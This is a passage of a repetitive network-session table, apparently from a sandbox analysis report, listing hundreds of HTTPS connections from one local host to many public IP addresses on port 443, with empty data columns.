                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11428192.168.2.1446648206.208.239.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11429192.168.2.145327424.101.14.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11430192.168.2.1449838217.33.244.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11431192.168.2.1453592160.5.107.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11432192.168.2.1447722147.251.82.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11433192.168.2.144180275.178.159.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11434192.168.2.1456386129.44.49.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11435192.168.2.143521225.86.239.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11436192.168.2.1442488184.102.184.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11437192.168.2.1443488135.102.134.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11438192.168.2.1433050165.201.109.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11439192.168.2.1438028124.157.15.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11440192.168.2.1456482121.239.9.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11441192.168.2.1437782147.138.68.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11442192.168.2.1443274211.51.60.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11443192.168.2.1441934183.45.44.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11444192.168.2.145159046.146.122.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11445192.168.2.143400076.207.14.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11446192.168.2.1439872166.242.247.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11447192.168.2.1455154202.53.114.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11448192.168.2.144913276.160.117.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11449192.168.2.1443826112.21.145.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11450192.168.2.1460068100.219.167.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11451192.168.2.144822438.239.245.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11452192.168.2.143778638.13.161.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11453192.168.2.1442414189.169.56.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11454192.168.2.1451670154.179.156.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11455192.168.2.144055678.19.174.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11456192.168.2.1453536166.102.16.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11457192.168.2.1448680189.108.148.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11458192.168.2.145751694.170.94.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11459192.168.2.144829862.39.52.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11460192.168.2.144738887.120.14.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11461192.168.2.145052662.123.112.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11462192.168.2.1440880106.204.155.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11463192.168.2.1438030173.197.236.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11464192.168.2.1442014177.37.202.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11465192.168.2.1444276119.66.88.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11466192.168.2.144801070.192.245.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11467192.168.2.1454886187.95.74.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11468192.168.2.1438886148.55.10.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11469192.168.2.144935642.107.145.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11470192.168.2.1445862185.90.60.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11471192.168.2.144148291.230.101.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11472192.168.2.144688638.126.205.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11473192.168.2.1447226200.62.38.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11474192.168.2.1448974122.9.173.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11475192.168.2.144057250.197.87.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11476192.168.2.145089820.30.239.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11477192.168.2.1456124172.98.47.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11478192.168.2.145165239.65.116.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11479192.168.2.145860845.57.205.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11480192.168.2.1433340109.233.7.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11481192.168.2.14573181.121.6.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11482192.168.2.1443724145.196.175.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11483192.168.2.1443214190.167.202.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11484192.168.2.1447948172.202.66.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11485192.168.2.145283237.231.59.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11486192.168.2.14476281.58.6.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11487192.168.2.1445206204.126.154.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11488192.168.2.1439540217.12.69.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11489192.168.2.1436012217.120.225.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11490192.168.2.1433220160.30.126.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11491192.168.2.144355093.21.28.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11492192.168.2.1459214205.154.83.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11493192.168.2.1436706116.250.195.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11494192.168.2.1449060149.156.18.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11495192.168.2.1448334193.156.94.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11496192.168.2.1459550130.128.38.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11497192.168.2.1453010160.129.203.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11498192.168.2.145509044.161.139.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11499192.168.2.1454032205.207.34.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11500192.168.2.146091650.207.70.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11501192.168.2.1455506112.133.168.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11502192.168.2.1433662157.162.155.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11503192.168.2.1437680114.99.20.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11504192.168.2.1460556178.191.182.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11505192.168.2.1448464110.245.227.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11506192.168.2.1444150160.215.95.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11507192.168.2.1458500122.91.190.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11508192.168.2.143418096.225.235.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11509192.168.2.1459456173.72.124.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11510192.168.2.145317648.247.131.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11511192.168.2.144235461.42.75.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11512192.168.2.1454810116.115.148.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11513192.168.2.1452010118.43.79.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11514192.168.2.1449928111.51.183.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11515192.168.2.143556419.42.71.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11516192.168.2.145766234.177.150.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11517192.168.2.1437760174.203.235.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11518192.168.2.1460070171.67.147.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11519192.168.2.1447270202.28.225.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11520192.168.2.1449986110.78.240.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11521192.168.2.144214460.19.136.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11522192.168.2.143937612.8.72.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11523192.168.2.145496654.21.23.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11524192.168.2.1444638200.110.213.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11525192.168.2.143588435.118.211.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11526192.168.2.145997827.192.190.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11527192.168.2.1432802175.126.23.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11528192.168.2.1451494101.102.177.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11529192.168.2.145695420.184.98.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11530192.168.2.145470632.86.196.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11531192.168.2.1441934122.27.76.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11532192.168.2.1444900124.121.122.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11533192.168.2.144326212.248.85.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11534192.168.2.143533687.70.71.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11535192.168.2.145501296.245.81.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11536192.168.2.1443560147.116.33.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11537192.168.2.1449374170.167.65.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11538192.168.2.1458324112.249.25.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11539192.168.2.1455336202.213.158.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11540192.168.2.144005818.135.191.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11541192.168.2.1457896189.76.81.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11542192.168.2.1448792141.230.107.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11543192.168.2.1455660198.56.8.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11544192.168.2.1449310178.32.143.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11545192.168.2.143467025.217.206.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11546192.168.2.1445190183.211.44.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11547192.168.2.1447318203.163.110.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11548192.168.2.1436012186.195.202.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11549192.168.2.143338024.209.33.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11550192.168.2.1460270145.126.70.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11551192.168.2.1445840165.80.173.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11552192.168.2.144783898.31.140.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11553192.168.2.1436684167.242.164.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11554192.168.2.1439598119.146.210.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11555192.168.2.144171065.245.119.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11556192.168.2.14439408.163.216.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11557192.168.2.1453982190.23.87.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11558192.168.2.143986235.4.72.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11559192.168.2.1450670147.146.203.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11560192.168.2.1436788105.16.128.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11561192.168.2.1439102195.32.84.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11562192.168.2.143920664.59.144.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11563192.168.2.145799064.39.39.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11564192.168.2.1436178130.21.189.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11565192.168.2.145361480.49.106.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11566192.168.2.1446250209.205.181.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11567192.168.2.1436360106.176.226.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11568192.168.2.1449186160.179.54.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11569192.168.2.145148486.128.12.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11570192.168.2.1454378145.176.19.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11571192.168.2.1438602144.57.75.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11572192.168.2.1449486220.109.247.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11573192.168.2.1444342116.102.196.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11574192.168.2.1434330181.60.89.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11575192.168.2.1458234170.189.205.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11576192.168.2.145736685.233.210.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11577192.168.2.144470874.89.183.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11578192.168.2.145756854.210.136.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11579192.168.2.1438092113.220.163.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11580192.168.2.1456400149.169.244.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11581192.168.2.146043879.3.159.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11582192.168.2.1435098178.228.125.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11583192.168.2.145049838.11.113.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11584192.168.2.145668879.207.76.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11585192.168.2.1454240180.207.157.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11586192.168.2.144834048.143.231.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11587192.168.2.1442436150.14.156.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11588192.168.2.143537443.8.157.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11589192.168.2.1445614220.251.200.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11590192.168.2.1445934205.163.209.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11591192.168.2.144324238.155.120.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11592192.168.2.1456002210.143.240.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11593192.168.2.143689096.104.114.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11594192.168.2.14430384.168.14.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11595192.168.2.1441638174.122.255.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11596192.168.2.144229292.210.242.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11597192.168.2.145304880.78.156.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11598192.168.2.143573463.65.252.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11599192.168.2.145485053.123.184.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11600192.168.2.1451304217.96.141.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11601192.168.2.1446198219.132.93.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11602192.168.2.1458022141.178.235.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11603192.168.2.145925844.118.65.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11604192.168.2.1456544206.171.132.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11605192.168.2.1456096186.115.120.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11606192.168.2.1437674210.112.143.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11607192.168.2.144719260.146.236.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11608192.168.2.143457468.246.97.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11609192.168.2.144031674.48.31.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11610192.168.2.1436574195.113.84.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11611192.168.2.1451148152.147.67.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11612192.168.2.145262487.194.133.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11613192.168.2.143839048.135.85.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11614192.168.2.143311273.124.119.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11615192.168.2.1444618160.48.72.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11616192.168.2.144858018.108.117.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11617192.168.2.145461061.70.134.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11618192.168.2.1438548192.45.99.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11619192.168.2.1449128119.100.41.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11620192.168.2.1456654187.133.86.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11621192.168.2.143336853.181.206.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11622192.168.2.144127653.162.183.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11623192.168.2.1442478100.39.203.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11624192.168.2.1454374174.183.185.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11625192.168.2.144982418.113.7.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11626192.168.2.1451726138.255.2.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11627192.168.2.1448208142.73.163.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11628192.168.2.1450448198.32.70.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11629192.168.2.1440002207.84.156.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11630192.168.2.1440914169.115.176.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11631192.168.2.1442234122.40.54.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11632192.168.2.143918871.179.107.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11633192.168.2.1446832184.137.187.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11634192.168.2.1459564160.61.79.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11635192.168.2.143318080.246.31.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11636192.168.2.1438050199.151.5.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11637192.168.2.1444960199.34.134.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11638192.168.2.1455626205.122.131.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11639192.168.2.1458440212.203.255.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11640192.168.2.144007817.144.149.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11641192.168.2.145710286.245.138.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11642192.168.2.144792890.62.30.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11643192.168.2.1444952213.240.37.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11644192.168.2.144758894.14.198.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11645192.168.2.1443484119.72.46.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11646192.168.2.146012080.117.81.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11647192.168.2.144105663.120.61.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11648192.168.2.1444152182.63.14.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
